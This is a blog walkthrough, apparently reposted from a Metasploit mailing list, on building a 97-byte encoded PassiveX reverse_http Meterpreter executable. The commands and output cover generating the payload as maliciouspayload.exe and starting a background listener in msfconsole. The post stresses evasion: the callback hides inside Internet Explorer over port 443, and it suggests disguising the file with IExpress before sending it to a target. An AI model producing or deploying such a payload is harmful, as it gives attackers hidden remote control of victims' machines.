I posted this walkthrough to the Metasploit mailing list, but thought that it would serve well here as well. Especially with the recent iPhone 3.0 “Special” download spam I recently received. The binary comes out to a whopping 97 bytes for the stager. Would be a blazing fast download and coupled with the IExpress “hack” would make for an very hard to spot payload.
A really down and dirty explination of what PassiveX is and why it’s useful in this sort of situation is that instead of making a direct connection back to you, it uses an iexplorer process with a cool ActiveX control to talk back. So someone looking for a rogue process will only see Internet Explorer open and talking over port 443 (as specified).
(props to skape for writting PassiveX and @NatronKeltner for kicking in the latest tweaks to make it work with IE7/IE8)
And msfencode’s options if you chose to use it as I demonstrate below. However, encoding happens by default with msfpayload (IIRC):
./msfencode -h
Usage: ./msfencode <options>
-a <opt> The architecture to encode as
-b <opt> The list of characters to avoid: 'x00xff'
-c <opt> The number of times to encode the data
-e <opt> The encoder to use
-h Help banner
-i <opt> Encode the contents of the supplied file path
-l List available encoders
-m <opt> Specifies an additional module search path
-n Dump encoder information
-o <opt> The output file
-s <opt> The maximum size of the encoded data
-t <opt> The format to display the encoded buffer with (c, elf, exe, java, perl, raw, ruby, vba)
Here we create the PassiveX payload. Note the PX options instead of the LHOST/LPORT:
./msfpayload windows/reflectivemeterpreter/reverse_http PXHOST= PXPORT=443 PXURI=/ R | ./msfencode -t exe -o /tmp/maliciouspayload.exe
[*] x86/shikata_ga_nai succeeded with size 97 (iteration=1)
Now that we have our “malicious payload” in /tmp we get our listener ready (you can use msfcli as well, I just like msfconsole because it provides me more flexibility):
(I’m showing you ‘exploit’s options because a lot of people don’t know they exist. With two lines you can start your listener (use, then exploit):**
Usage: exploit [options]
Launches an exploitation attempt.
-e <opt> The payload encoder to use. If none is specified, ENCODER is used.
-h Help banner.
-j Run in the context of a job.
-n <opt> The NOP generator to use. If none is specified, NOP is used.
-o <opt> A comma separated list of options in VAR=VAL format.
-p <opt> The payload to use. If none is specified, PAYLOAD is used.
-t <opt> The target index to use. If none is specified, TARGET is used.
-z Do not interact with the session after successful exploitation.
msf exploit(handler) > exploit -j -z -p windows/reflectivemeterpreter/reverse_http -o PXHOST=,PXPORT=443,PXURI=/,ExitOnSession=False
[*] Exploit running as background job.
[*] PassiveX listener started.
[*] Starting the payload handler...
msf exploit(handler) >
Listener ready to go. I chose IP: just to make things easy. Just send off maliciouspayload.exe to your target and you’re set.